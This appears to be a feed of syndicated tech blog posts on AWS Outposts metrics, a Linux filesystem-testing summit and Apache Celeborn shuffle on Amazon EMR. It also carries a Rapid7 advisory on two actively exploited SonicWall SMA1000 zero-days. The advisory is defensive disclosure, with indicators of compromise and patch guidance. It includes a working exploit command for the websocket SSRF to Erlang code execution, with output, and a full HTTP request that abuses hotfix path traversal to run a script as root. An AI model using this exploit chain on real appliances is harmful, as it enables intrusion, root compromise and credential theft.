AvailableInstanceType_Count | i3en.metal-2tb | RETIRING | count = 0

UsedInstanceType_Count | i3en.metal-2tb | count = 4
UsedInstanceType_Count | i3en.metal-2tb | ACTIVE | count = 3
UsedInstanceType_Count | i3en.metal-2tb | ISOLATED | count = 1
UsedInstanceType_Count | i3en.metal-2tb | RETIRING | count = 0

InstanceTypeCapacityAvailability | i3en.metal-2tb | 20%
InstanceTypeCapacityUtilization | i3en.metal-2tb | 80%

Figure 1: Amazon CloudWatch metrics with the AssetState dimension for AWS Outposts.

You can now accurately monitor your AWS Outposts capacity and set CloudWatch alarms that reflect available capacity with near real-time visibility.

Integration with CloudWatch on Outposts

This enhanced dimension is fully integrated with CloudWatch on Outposts, so you can monitor your local AWS Outposts infrastructure with the same observability tools you use in AWS Regions.

With the new AssetState dimension, you can create more precise CloudWatch alarms on your Outpost that trigger only on capacity status changes (ACTIVE/ISOLATED/RETIRING). This is particularly valuable if you run mission-critical workloads on Outposts and need accurate, real-time visibility into your on-premises capacity.

Availability

These new metrics are enabled by default and available to all AWS Outposts customers at no additional cost in all AWS Regions where AWS Outposts is offered.

Conclusion

The new AssetState dimension gives AWS Outposts customers clear visibility into the different hardware states of Active, Isolated, or Retiring. This visibility helps you maintain accurate capacity counts and create more precise CloudWatch alarms.

To learn more about CloudWatch metrics for AWS Outposts, refer to the Outposts monitoring documentation. For information about CloudWatch on Outposts and local monitoring capabilities, visit the CloudWatch on Outposts documentation.

Rapid7 MDR Team Discovers New SonicWall SMA1000 Zero Days being Actively Exploited (CVE-2026-15409, CVE-2026-15410)

Post Syndicated from Rapid7 original https://www.rapid7.com/blog/post/etr-rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410

Overview

On July 14, 2026, SonicWall published a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability CVE-2026-15409 (CVSS 10.0) and the high-severity code injection vulnerability CVE-2026-15410. The advisory urges customers to immediately apply the latest platform hotfix releases.

Successful exploitation of CVE-2026-15409 permits an unauthenticated attacker to open a websocket-based tunnel to arbitrary localhost-only services, while CVE-2026-15410 is a local privilege escalation that permits an attacker with access to an internal service listening on port 8188 on localhost to execute arbitrary operating system commands as root via a malicious path traversal-based remove_hotfix workflow.

Both vulnerabilities are being actively exploited in the wild. Prior to SonicWall’s official vulnerability disclosure, Rapid7’s Managed Detection and Response team observed active, targeted zero-day exploitation of internet-facing SMA 1000-series appliances. In the SonicWall advisory, exploitation in the wild was noted, and both CVE-2026-15409 and CVE-2026-15410 have been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Given the confirmed exploitation activity and the critical unauthenticated impact of the vulnerabilities, organizations should prioritize remediation of SMA1000 appliances on an emergency basis. A Python proof-of-concept for CVE-2026-15409 is available here for exposure validation, and a Metasploit module for the chain is in development.

Affected products include SonicWall SMA1000 Series models 6210, 7210, and 8200v running:

  • 12.4.3-03245

  • 12.4.3-03387

  • 12.4.3-03434 (platform-hotfix)

  • 12.5.0-02283

  • 12.5.0-02624

  • 12.5.0-02800 (platform-hotfix)

These vulnerabilities do not affect SSL VPN functionality on SonicWall firewalls or the SMA 100 Series product line.

Technical overview

The primary vulnerability is in a websocket proxy feature, accessed via the path /wsproxy on the affected “SonicWall WorkPlace” application (served on port 443 by default). This feature permits a netcat-like TCP tunnel to arbitrary hosts and ports, which are provided by the user in URL parameters. By providing host values that point to localhost, the attacker can access local SonicWall appliance system services behind the firewall to send and receive arbitrary TCP traffic to and from them. This is the first-stage vulnerability, CVE-2026-15409, that Rapid7 MDR analysts are seeing attackers exploiting in the wild. With this capability, an attacker can reach and exploit less-hardened services running on the appliance, such as the Erlang application on localhost:1050 or the ctrl-service application on localhost:8188. 

We developed an exploit targeting the Erlang process listening on localhost:1050 for remote code execution. Note that the provided cookie value is hardcoded for the Erlang process, based on our testing, so authentication is not required to establish code execution.

# python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'whoami && id && pwd && hostname'
Authenticated to [email protected]
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 => couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma

With code execution established, the attacker can escalate to root on the appliance by exploiting CVE-2026-15410, which is a path traversal in the remove_hotfix workflow of ctrl-service. This can be performed via the web console or by hitting port 8188 on the device. The attacker provides a hotfix value containing a path traversal sequence to a malicious script, such as “../../../../var/tmp/privesc”. The system executes the script as root and (typically) reboots the appliance immediately after.
An example malicious request achieving privilege escalation by leveraging this from the web panel is depicted below:

POST /rollbackConfirm.action HTTP/1.1
Host: 192.168.181.46:8443
Cookie: EXTRAWEB_REFERER=%252F; JSESSIONID=node01bcg1tbiy6qi7s97xsoa42lhp8.node0
Content-Length: 134
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="24", "Chromium";v="152"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
Origin: https://192.168.181.46:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.181.46:8443/rollbackConfirm.action
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

csrfToken=GFEJUCQBUZOLUCCOO3YBA8G30ZE9VKDP&command=rollback&rollbackUpgradeTime=&hotfix=../../../../../tmp/1234.sh&rollbackHotfixTime=

If the provided hotfix file does not exist, a reboot does not occur. If the provided file exists, the system reboots after it chmods and executes the file. Below is a system monitor (pspy) depicting output of this occurring during exploitation:

2026/07/09 23:21:00 CMD: UID=0     PID=10355  | chmod +x /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh
2026/07/09 23:21:00 CMD: UID=0     PID=10355  | /bin/bash /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh --unattended
2026/07/09 23:21:00 CMD: UID=0     PID=10361  | /usr/bin/python3 /usr/local/ctrl-service/bin/ctrl-service.py
[...]
2026/07/09 23:21:22 CMD: UID=0     PID=11124  | shutdown -r now

A Python proof-of-concept for CVE-2026-15409 is available here; a Metasploit module for the chain is in development.

Mitigation guidance

Organizations operating SonicWall SMA1000 appliances should immediately upgrade to the latest platform hotfix releases.

Fixed versions are:

Product

Fixed Version

SMA1000 Series (6210, 7210, 8200v)

12.4.3-03453 (platform-hotfix) or later

SMA1000 Series (6210, 7210, 8200v)

12.5.0-02835 (platform-hotfix) or later

There are no workarounds available.

Because active exploitation has been confirmed, organizations should not rely solely on patching. SonicWall additionally recommends:

  • Performing a thorough forensic review for indicators of compromise.

  • Re-imaging physical appliances or redeploying virtual appliances if compromise is identified.

  • Changing user and administrator passwords.

  • Resetting TOTP tokens following confirmed compromise.

Customers should consult the SonicWall security advisory for the latest remediation guidance and platform hotfix availability.

Observed exploitation

Prior to SonicWall’s official vulnerability disclosure, our Managed Detection and Response team observed active, targeted exploitation of internet-facing SMA 1000-series appliances. Threat actors were primarily leveraging the perimeter appliance as a stealthy initial access vector, executing commands on the operating system by bypassing traditional input validation controls. Once they established a foothold on the appliance, the actors systematically extracted high-value credentials, active session databases, and Time-Based One-Time Password (TOTP) multi-factor authentication (MFA) seed configurations. This local harvesting was designed to ensure long-term, persistent access that could survive standard network-level remediations.

With these harvested resources, the threat actors quickly shifted to lateral movement, pivoting from the compromised appliance directly into the internal corporate network. Specifically, we observed a sequence of anomalous, VPN-less Active Directory authentications targeting core domain controllers. These authentications originated directly from the appliance’s internal IP address, using atypical, non-corporate workstation client names (such as kali or other non-inventory hostnames) under the context of the appliance’s integrated LDAP service account. This unique behavior of direct, machine-level lateral movement with no corresponding active VPN tunnel confirmed that the appliance itself had been fully compromised and was acting as an unmonitored backdoor into the corporate directory infrastructure.

Artifacts or evidence sources and IOCs

Rapid7 recommends reviewing appliance logs for evidence of active exploitation, including the following characteristic behaviors and specific log indicators:

Characteristic Behaviors

  • Websocket exploit IOC log patterns: extraweb_access.log entries containing the strings (“GET” AND “wsproxy” AND “=-3389” AND “ 101 “) indicate interactions with the niche affected service. If suspicious host parameter values such as “0.0.0.0”, “localhost”, or “::ffff:127.0.0.1” are present, that’s indicative of likely exploitation of CVE-2026-15409. Note that “serviceType=SSH” was used in our published materials, but options such as “serviceType=TELNET” are viable alternatives.

  • Hotfix removal exploit IOC log patterns: The ctrl-service.log shows the hotfix-removal utility (/usr/local/bin/remove_hotfix) being invoked with traversal sequences pointing to attacker-staged shell script payloads (e.g., ../../../../../../tmp/sma1000_5c47.sh). This is indicative of successful exploitation of CVE-2026-15410.

  • Internet-facing probing: Enumeration of the SMA portal, including repeated requests to /auth1.html, path-traversal attempts, and generic file/enumeration requests (e.g., /.env, /api/sonicos/is-sslvpn-enabled).

  • Authentication activity: Authentication-API activity against /__api__/logon/<session-id>/authenticate.

  • Sensitive path access: Access to sensitive appliance paths such as /tmp/temp.db*, consistent with theft of stored session data.

  • AD/Service Account Compromise: NTLM logons (Windows Event ID 4624, logon type 3) into internal domain controllers sourced from the appliance’s internal IP address, using attacker-controlled workstation names (e.g., kali) without a corresponding VPN session.

  • extraweb_access.log: Requests to /__api__/login or /__api__/logout returning HTTP 200, and requests to /wsproxy containing suspicious host parameters returning HTTP 101.

Configuration artifacts

  • /var/lib/unit/conf.json containing routes for /__api__/login or /__api__/logout, which are not present in legitimate configurations.

Atomic Indicators

  • F.N.S Holdings Limited (ASN – 206092): The threat actor(s) utilized varying IP addresses, but they belonged to the VPN hosting provider FNS Holdings Limited. Limit or block access to FNS Holdings Limited if there is no business need. For reference, the IP addresses we observed were:

    • 45.131.194.0/24

    • 45.146.54.0/24

    • 63.135.161.0/24

    • 173.239.211.0/24

    • 193.37.32[.]179

    • 193.37.32[.]214

    • 216.73.163[.]151

    • 216.73.163[.]158

If any indicators of compromise are identified, organizations should treat the appliance as compromised and follow SonicWall’s recovery guidance.

Rapid7 customers

Organizations should prioritize identifying all internet-facing SonicWall SMA1000 appliances and determine whether affected software versions remain deployed. Given SonicWall’s and Rapid7’s confirmation of active exploitation, exposed appliances should be considered high-priority assets for remediation.

Security teams should also review available authentication, web access, and appliance management logs for the indicators published by SonicWall to determine whether follow-up incident response activities are warranted.

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM, and Nexpose customers will be able to assess exposure to CVE-2026-15409 and CVE-2026-15410 with authenticated vulnerability checks available in the July 15 content release.

Updates

July 15, 2026: Initial publication.

[$] Topics in filesystem testing

Post Syndicated from jake original https://lwn.net/Articles/1082342/

It should come as no surprise that a gathering of filesystem developers
would discuss filesystem testing; it has been a mainstay of the Linux Storage,
Filesystem, Memory Management, and BPF Summit
over the years and the
2026 summit was no exception. Ted Ts’o led the discussion this time; he
had a few different topics to raise, including his perception of increasing
regressions for ext4 in the stable kernels and what can be done to help
reduce them. As with other similar
sessions at the summit over the years,
there is a lot of interest in collaborating on test inputs and outputs, but
finding a way to centralize that information has so far eluded the
filesystem community.

High-performance Remote Shuffle Service on Amazon EMR with Apache Celeborn

Post Syndicated from Suvojit Dasgupta original https://aws.amazon.com/blogs/big-data/high-performance-remote-shuffle-service-on-amazon-emr-with-apache-celeborn/

Organizations running large-scale Apache Spark workloads often face a trade-off between achieving lower cost and job reliability. These tradeoffs are more prominent when using Amazon Elastic Compute Cloud (Amazon EC2) Spot Instances or when their jobs process highly skewed datasets. Three shuffle-related challenges drive the pain:

  1. Spot interruptions trigger costly recomputation: Spot instances can reduce compute spend by up to 90 percent compared to On-Demand instances, but they can be reclaimed with only two minutes of notice. When a Spark executor on a Spot Instance is interrupted, its local shuffle data is lost, and Spark must recompute entire upstream stages to regenerate that data. For shuffle-heavy jobs processing terabytes of data, frequent interruptions cause cascading recomputation and runtime delays, quickly eroding the savings that made Spot attractive in the first place.
  2. Local shuffle storage causes cluster-wide over-provisioning: In YARN-based Hadoop architectures, including Amazon EMR on EC2, the External Shuffle Service (ESS) stores shuffle data locally on each Node Manager’s node alongside the Spark executor that produced it. Every node must carry large memory and disk allocations to accommodate shuffle output, yet only a few EC2 nodes perform most of the shuffle work. The rest sit oversized and underused. This is a classic coupled storage-compute problem. By decoupling shuffle storage to a dedicated, storage-optimized tier, you can right-size your compute for actual demands.
  3. Shuffle data protection leaves compute idle: To guard against local shuffle data loss, Spark’s scaling logic prevents nodes that still hold shuffle data from scaling down. EC2 nodes sit idle long after Spark tasks complete. Data skew amplifies this effect: tail-end tasks run far longer than typical ones, delaying shuffle reads and postponing scale-down across the cluster.

Together, these challenges force a difficult choice: cheaper infrastructure or predictable jobs. In this post, we show how Apache Celeborn resolves this trade-off for Amazon EMR on EKS and Amazon EMR on EC2, improving job reliability while unlocking additional cost savings.

What is Apache Celeborn?

Apache Celeborn is an open-source Remote Shuffle Service (RSS) that solves the preceding problems by decoupling shuffle data from the executor lifecycle entirely. It uses a Leader-Worker-Client architecture: Leader nodes manage metadata, Workers read and write shuffle blocks, and Clients integrate with compute engines. Instead of writing shuffle output to local disks, Spark executors push data to a shared, storage-optimized Celeborn cluster that persists shuffle data independently of executor location. This means EMR executor nodes can run on 100% Spot Instances. Spot reclamations no longer cause shuffle data loss. Executors scale in and out freely without triggering upstream recomputation.

Celeborn also provides Raft-based high availability, per-job data replication, and a pluggable shuffle manager that replaces Spark’s default mechanism with minimal configuration changes. With its push-based model, Spark executors send shuffle data directly to Celeborn workers, which cache and consolidate partitions. This reduces the N×M network connections during the read phase, improving both performance and stability at scale.

Push-based remote shuffle service where Spark executors on Amazon EMR push shuffle data to a shared Celeborn cluster

Image 1: Push-based Remote Shuffle Service for Spark on EMR

Overview of solution

In this post, we show you how to deploy a Celeborn cluster alongside EMR on EKS and EMR on EC2. The solution also includes an observability stack to provide operational visibility into the Celeborn cluster. Metrics are collected by the AWS Distro for OpenTelemetry (ADOT) collector and routed to two monitoring paths. The AWS managed option uses Amazon Managed Service for Prometheus and Amazon Managed Grafana. The open source option uses self-managed Prometheus with a built-in Grafana.

Apache Celeborn can be deployed in several ways depending on your operational requirements and scale. These two deployment patterns are the main ones:

  • Co-located on the same cluster: Celeborn runs on the same compute environment as Spark. This is the most straightforward operational model, with no cross-cluster networking. The main constraint is shared cluster lifecycle: any upgrade or termination affects Celeborn and running Spark jobs simultaneously.
  • Separate Celeborn cluster: Celeborn runs on its own EC2 or EKS cluster, fully isolated from Spark compute. This is the most operationally flexible model and is the focus of this post.

In this solution, Celeborn runs on a dedicated Amazon Elastic Kubernetes Service (Amazon EKS) cluster, separate from the EMR Spark environments. The two workloads have different resource profiles. Celeborn is storage and network I/O intensive, while Spark is CPU and memory intensive. By separating them, each cluster can use instance types optimized for its workload. It also improves independent lifecycle management, so you can upgrade or scale Celeborn clusters without disrupting Spark jobs, and the other way around.

Solution architecture with EMR on EKS and EMR on EC2 connecting to a shared Celeborn cluster through an internal Network Load Balancer

Image 2: Solution Architecture

As the architecture diagram shows, two types of EMR deployment models, EMR on EKS and EMR on EC2, connect to a shared Celeborn cluster through an internal Network Load Balancer (NLB). Behind the scenes, Spark executors register their shuffle partitions to Celeborn workers through this connection, while reducers read consolidated data back during the fetch phase.

The following are the key design considerations for this solution:

  • Streamlined operation by a shared RSS model: Celeborn runs on a dedicated EKS cluster. This provides lifecycle independence, allows each cluster to use workload-optimized instance types, and allows a single Celeborn cluster to serve multiple EMR clusters as a shared service.
  • Cross-cluster connectivity: Clusters reside in the same Amazon Virtual Private Cloud (Amazon VPC) and share private subnets. The AWS Load Balancer Controller on the Celeborn cluster provisions an internal NLB exposing its active primary pods on ports 9097 (RPC) and 9098 (dashboard). The NLB DNS name is VPC-resolvable, so any EMR cluster in the same VPC can reach Celeborn by setting spark.celeborn.master.endpoints to the NLB address.
  • Restricted and secured networking: The Celeborn cluster only allows inbound traffic from the EMR on EC2 and EMR on EKS clusters, sending shuffle data and metrics over the network to the Celeborn cluster.
  • State persistence: Primary nodes maintain Celeborn’s coordination state through Raft consensus, which requires storage that survives pod restarts. Deploying them as StatefulSets with EBS-backed persistent volume claims (PVC) lets a restarted primary pod recover its Raft log and identity from durable storage rather than starting from scratch. Workers keep shuffle data on local NVMe instance store for performance, but this is ephemeral. To protect data loss on workers, each shuffle partition is replicated to two other workers by setting spark.celeborn.client.push.replicate.enabled=true.
  • Observability: ADOT collector is deployed on the Celeborn EKS cluster. It scrapes Prometheus metrics from Celeborn’s pods, and simultaneously remote writes them to two monitoring backends. Option 1 uses Amazon Managed Service for Prometheus as the metrics store, with Amazon Managed Grafana surfacing pre-built dashboards for Celeborn cluster health and Java Virtual Machine (JVM) metrics. This option requires AWS IAM Identity Center. Option 2 deploys a self-managed Prometheus stack with a built-in Grafana on the Celeborn EKS cluster, with Prometheus configured as a remote-write receiver for the same ADOT collector. This option suits environments without IAM Identity Center or those preferring a single open-source tooling.

Critical configurations

The following two tables list the key configurations that make up the solution.

  • Spark configuration (RSS client): Tells the Spark client to use Celeborn as the shuffle manager in place of Spark’s built-in implementation.
  • Celeborn configuration (RSS server): Controls how the primary and worker Celeborn pods operate on Kubernetes.

Note: The values in the following tables are reference defaults used in this walkthrough. Adjust them based on your workload requirements and cluster sizing.

1. Spark configuration (RSS client)

The following table highlights some key Spark configurations required to use Celeborn as the shuffle manager. You can refer to these configurations applied for each Spark submission method in the scripts below:

Parameter Value Purpose
spark.shuffle.service.enabled false Disables Spark’s built-in External Shuffle Service. Must be off before Celeborn can take its place
spark.shuffle.manager org.apache.spark.shuffle.celeborn.SparkShuffleManager Replaces Spark’s default SortShuffleManager with Celeborn’s shuffle manager
spark.celeborn.master.endpoints <NLB_DNS>:9097 Points Spark to the Celeborn primary RPC endpoint through the internal NLB. You can add multiple NLB addresses here, separated by a comma.
spark.shuffle.sort.io.plugin.class org.apache.spark.shuffle.celeborn.CelebornShuffleDataIO Registers Celeborn’s data I/O plugin alongside the shuffle manager
spark.celeborn.client.push.replicate.enabled true

Default: false

OPTIONAL: if shuffle performance has a higher priority than job stability, turn off the data replication at a job level. This setting replicates shuffle data across multiple Celeborn workers for fault tolerance.

spark.celeborn.client.spark.push.unsafeRow.fastWrite.enabled false Default: true COMPULSORY: Disables Celeborn’s optimization for UnsafeRow, making it compatible with the optimized Spark runtime in EMR
spark.dynamicAllocation.shuffleTracking.enabled false Default: true COMPULSORY: Disables shuffle tracking.
spark.sql.adaptive.localShuffleReader.enabled false

Default: true.

COMPULSORY: makes sure Spark does not use local shuffle readers to read the shuffle data.

spark.celeborn.client.spark.shuffle.fallback.policy NEVER

Default: AUTO.

COMPULSORY: to make sure we don’t see intermittent writes to local and remote shuffles.

2. Celeborn configuration (RSS server)

The following table provides the server-side settings that control how the Celeborn primary and worker pods operate on Kubernetes. These values are set in the Helm values.yaml file.

Parameter Value Purpose
master.replicas 3 Number of Celeborn primary node replicas for HA. A minimum 3 required for Raft quorum
worker.replicas 3 Number of Celeborn workers to store shuffle data, should be less than EC2 node number.
master.volumeClaimTemplates gp3, 5 GiB Persistent storage for Raft consensus state
worker.volumes 4 × hostPath (/mnt/nvme/disk1-4) Shuffle data stored on local NVMe instance store is ephemeral but significantly faster than Amazon Elastic Block Store (EBS) volumes for shuffle I/O
master/worker tolerations celeborn-dedicated Schedules Celeborn pods only on dedicated tainted nodes
master/worker podAntiAffinity preferred, w=100 Spreads replicas across different nodes to limit failure blast radius
image.tag 0.6.2 Pinned Apache Celeborn version

Deploy the solution

This solution contains six layers, each of which is dependent on the previous deployments. See the details in the following deployment steps:

  • Shared Infrastructure (Step 2).
  • Celeborn Remote Shuffle Service installation (Step 3).
  • Prepares sample data and creates EMR compute (Step 4, 5).
  • Observability Layer (Step 6-7 and Step 9).
  • Submit job (Step 8).
  • Cleanup (Step 10).

Note: This walkthrough creates billable AWS resources, including Amazon EKS clusters, EC2 instances, Amazon Managed Grafana, Amazon Managed Service for Prometheus, and a Network Load Balancer. To avoid ongoing charges, follow the cleanup instructions at the end of this post.

Prerequisites

Before you deploy this solution, make sure the following prerequisites are in place:

Deployment steps

Step 1: Clone from the source repository

Clone the repository to your local machine and set the AWS_REGION:

git clone https://github.com/aws-samples/sample-emr-celeborn-shuffle-service.git
cd sample-emr-celeborn-shuffle-service
export AWS_REGION=<AWS_REGION>

Step 2: Deploy the shared infrastructure

This step creates the core AWS resources, including the VPC, AWS Key Management Service (AWS KMS) key, security groups, and Amazon Simple Storage Service (Amazon S3) bucket.

./shared-infra/deploy.sh

Step 3: Deploy the Celeborn cluster

This step provisions a dedicated EKS cluster for Celeborn and exposes it through an internal NLB. It follows security best practices by keeping the EKS endpoint private, allowing public access only from a deployment workstation IP, and enabling encryption for secrets plus logging for all cluster components.

./celeborn/deploy.sh

Step 4: Prepare the sample data

Execute the following script to generate sample data:

./spark-jobs/setup-data.sh

Step 5. Deploy a compute engine (choose one or both)

Create at least one of the following EMR deployment models to run Spark jobs.

Option A: EMR on EKS

./emr-on-eks/deploy.sh

Option B: EMR on EC2

./emr-on-ec2/deploy.sh

Step 6. Deploy observability

To monitor the Celeborn cluster, deploy one of the observability options. After deployment, a Grafana URL and login details are available in the .environment-info file located at the repository’s root directory. Follow the instructions in Step 9 to sign in to your Grafana dashboard. You will see two pre-built dashboards on the Grafana web UI:

  • Celeborn Cluster Overview: Active shuffles, worker status, disk usage, and memory utilization.
  • Celeborn JVM Metrics: Heap usage, garbage collection, and thread activity.

Option A: AWS managed services

This option deploys an Amazon Managed Service for Prometheus workspace for metrics storage and an Amazon Managed Grafana workspace to host dashboards. Amazon Managed Grafana requires IAM Identity Center, so first enable it at the organization level and create an SSO user:

export SSO_USER_EMAIL=<your-email>
./observability/amp-amg/setup-sso.sh

Then deploy the stack:

./observability/amp-amg/deploy.sh

Option B: Open-source tool

This option deploys a Prometheus stack, including a built-in Grafana service, onto the Celeborn EKS cluster in the monitoring namespace.

./observability/prometheus-grafana/deploy.sh

Step 7: Deploy ADOT Collector

The ADOT collector scrapes Prometheus metrics from Celeborn pods and remote-writes them to all active monitoring backends: Amazon Managed Service for Prometheus, open-source Prometheus, or both.

./observability/adot/deploy.sh

Step 8: Submit a Spark job

The sample job is a PySpark word-count application that creates shuffle through groupBy and orderBy operations. Both EMR deployment options below are configured with Celeborn as the shuffle manager.

Option A: Using EMR on EKS

Submit the job using the StartJobRun API:

./emr-on-eks/submit-emr-api.sh

This code snippet shows the core part of the script (see the full version):

aws emr-containers start-job-run
  --virtual-cluster-id "${VIRTUAL_CLUSTER_ID}"
  --name "${job_name}"
  --execution-role-arn "${JOB_EXECUTION_ROLE_ARN}"
  --release-label "${EMR_RELEASE_LABEL}"
  --job-driver "{
    "sparkSubmitJobDriver": {
      "entryPoint": "${input_path}",
      "entryPointArguments": ["${data_input}", "${data_output}"],
      "sparkSubmitParameters": "
        --conf spark.shuffle.manager= \
        org.apache.spark.shuffle.celeborn.SparkShuffleManager
        ...
      "
    }
  }"

Alternatively, submit the job using a Spark Operator:

./emr-on-eks/submit-spark-operator.sh

The script automatically generates a SparkApplication manifest then applies it to EMR on EKS. For example, kubectl apply -f your-job-manifest-name.yaml

Option B: Using EMR on EC2

Submit the job as an EMR Step through the Steps API:

./emr-on-ec2/submit-job.sh

The following snippet shows the core API call used by the script:

aws emr add-steps
  --cluster-id "${CLUSTER_ID}"
  --region "${AWS_REGION}"
  --steps "Type=Spark,
  Name=${JOB_NAME},
  ActionOnFailure=CONTINUE,
  Args=[
    --deploy-mode,client,
    --conf,spark.shuffle.manager= \
    org.apache.spark.shuffle.celeborn.SparkShuffleManager,
    ...
  ]"

Step 9: Review the Grafana dashboard for remote shuffle metrics

The Grafana endpoint is dynamically generated at deploy time and is unique to your deployment. To access it, open the .environment-info file at the repository root. This file contains the Grafana URL along with login instructions. Sign in using the credentials listed there, then navigate to the Celeborn Cluster Overview dashboard to observe remote shuffle metrics in real time. A sample Grafana dashboard screenshot is shown below:

Grafana dashboard showing Celeborn remote shuffle metrics, including active shuffles and worker status

Image 3: Grafana dashboard for Celeborn Metrics

Step 10. Cleaning up

To avoid incurring future charges, run the cleanup script from the root directory:

./teardown.sh

This script detects which components are deployed and tears them down in reverse dependency order, automatically skipping components that are not present. Shared infrastructure is always deleted last, since other components depend on it.

WARNING: This will permanently remove all resources created previously, including any data stored in S3 buckets and configurations. The action cannot be undone. Make sure you have backed up any data you wish to retain before proceeding.

Considerations for production implementation

This post demonstrates a working end-to-end architecture for integrating Celeborn with Amazon EMR. Before taking this pattern to production, consider the following areas.

1. Security

The following considerations help you secure a Celeborn deployment across data isolation, encryption, and access control.

1.1. Shuffle data isolation between teams

Celeborn partitions shuffle data by application ID, which is designed to prevent jobs from accidentally reading each other’s data. This is sufficient when all jobs share the same trust boundary. For multi-team deployments where data privacy is required, a dedicated Celeborn cluster per team is the most effective isolation boundary: each team gets its own NLB and security group, and shuffle data never co-mingles at the infrastructure level.

1.2. Data in transit

In our implementation, shuffle data travels over plain TCP between Spark executors and Celeborn workers. Access is restricted to nodes using security groups. The internal NLB isn’t reachable outside the VPC, and security group rules block all other intra-VPC traffic.

For workloads requiring encryption in transit, Celeborn supports TLS on both RPC and data channels through the celeborn.ssl.* configuration. This is a cluster-wide setting that applies to all jobs on the cluster and must be enabled server-side in celeborn-defaults.conf.

1.3. Data at rest

EBS volumes (used for Celeborn leader pod Raft state) are encrypted with the shared AWS KMS key. NVMe instance store volumes on Celeborn worker nodes are ephemeral and not encrypted by default. Shuffle data written to NVMe is not protected by AWS KMS. For compliance requirements mandating encryption at rest, consider using EBS-backed worker storage instead of instance store, where worker pods mount PersistentVolumeClaim (through volumeClaimTemplates) that reference the encrypted gp3 StorageClass. This comes at the cost of lower I/O throughput compared to local NVMe.

1.4. EKS secrets encryption

EKS clusters encrypt Kubernetes secrets at rest using AWS KMS (EncryptionConfig in the cluster CloudFormation templates). This covers Kubernetes API objects but not application-level shuffle data.

1.5. Application-level authorization

Our deployment enforces access control in the network layer (that is, VPC and security group rules). Celeborn also provides an application-level authorization framework, which is disabled by default. Turning it on adds a second level of security control where only applications presenting valid credentials can register with the cluster. This is recommended for production deployments where multiple workloads or teams share the same VPC subnets, ensuring that network proximity alone does not grant shuffle service access.

Configuration for the Celeborn server:

celeborn.auth.enabled true # Enable SASL application authentication
celeborn.internal.port.enabled true # Required when enabling SASL authentication

Configuration to enable authentication in every Spark app:

--conf spark.celeborn.auth.enabled=true

2. Autoscaling

You can scale Celeborn workers or primary pods using kubectl. For example:

kubectl scale statefulsets celeborn-worker -n celeborn --replicas=6
kubectl scale statefulsets celeborn-master -n celeborn --replicas=2
  • Celeborn workers register with a primary node when they start, so scaling out is safe even while the cluster is running. Scaling in, however, requires more care. Removing a worker pod during an active job may cause shuffle data loss unless celeborn.client.push.replicate.enabled=true is enabled. To reduce the risk of accidental disruption during node scale-in or upgrades, add a Pod Disruption Budget to prevent multiple workers from being evicted at the same time.
  • Spark executors: Dynamic Resource Allocation (DRA) is enabled in sample Spark jobs (spark.dynamicAllocation.enabled=true). This means the number of executors can scale automatically within the configured minExecutors and maxExecutors range.

3. Resiliency

  • Primary Node HA: 3-replica Raft quorum with EBS-backed durable state is designed to tolerate one leader node failure without job interruption.
  • Worker replication: the setting celeborn.client.push.replicate.enabled=true copies each shuffle partition to two workers, designed to tolerate a single worker failure mid-job. Without replication, a worker failure causes a fetch failure and job retry.
  • Pod Disruption Budgets (PDB): not configured in this demo. Add PDBs for Celeborn’s StatefulSets to prevent simultaneous eviction during node upgrades or scale-in.
  • Multi-AZ placement: podAntiAffinity (preferred, weight 100) spreads pods across nodes and Availability Zones. For strict Availability Zone isolation, switch to requiredDuringSchedulingIgnoredDuringExecution.

4. Monitoring and alerting

Consider extending the Grafana dashboards with the alerting rules on:

  • Active shuffle partition count: indicator of job load.
  • Worker disk utilization: prevent shuffle storage exhaustion.
  • Push failure rate: early signal of connectivity or capacity issues.
  • Celeborn primary node failover: leadership changes indicate Raft instability.

Conclusion

In this post, we showed how to deploy Apache Celeborn as a Remote Shuffle Service on Amazon EKS and integrate it with Amazon EMR on EKS and Amazon EMR on EC2. By decoupling shuffle storage from Spark’s compute, this architecture delivers resilience to node failures, eliminates disk contention, and enables independent scaling of storage and compute tiers.

Running Celeborn on a dedicated cluster gives you lifecycle independence from Spark, lets multiple EMR clusters share a single shuffle service, and provides fault tolerance through push-based shuffling, Raft-based high availability, and per-job data replication. It also provides automatic fallback to Spark’s built-in shuffle during maintenance windows. Stop choosing between cost and reliability. With Celeborn on Amazon EMR, you get both.

For more information, see the Amazon EMR on EKS documentation and the Apache Celeborn documentation. To explore the full implementation, visit the aws-samples GitHub repository. If you have questions or feedback, leave us a comment.


About the authors

Suvojit Dasgupta

Suvojit Dasgupta

Suvojit is a Principal Architect at AWS, where he leads engineering teams delivering large-scale data and analytics solutions for some of AWS’s largest enterprise customers. He specializes in designing modern data platforms, real-time streaming architectures, and cloud-native analytics systems that allow organizations to process data at petabyte scale while optimizing performance and cost. His technical interests include distributed data systems, containerized analytics platforms, and building high-performance data infrastructure that uses Kubernetes and cloud-native technologies to power a wide variety of analytics workloads.

Melody Yang

Melody Yang

